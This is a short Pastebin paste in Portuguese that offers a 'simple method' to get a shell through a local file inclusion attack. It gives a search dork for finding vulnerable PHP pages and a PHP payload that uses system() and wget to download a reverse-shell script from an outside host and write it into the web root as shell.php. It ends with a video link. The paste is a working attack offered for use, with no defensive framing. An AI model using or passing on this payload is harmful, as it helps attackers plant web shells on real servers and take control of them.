Advertisement
syst3m_h4x0r

Ataque LFI

Dec 30th, 2018
22,190
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.20 KB | None | 0 0
  1. Método simples de obter uma shell .
  2.  
  3. Dork: example1.php?page=
  4.  
  5. PoC: <? system('wget http://sitealvo.com/php-reverse-shell.php -O /var/www/shell.php');?>
  6.  
  7. https://www.youtube.com/watch?v=-isaPV6wnuI
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement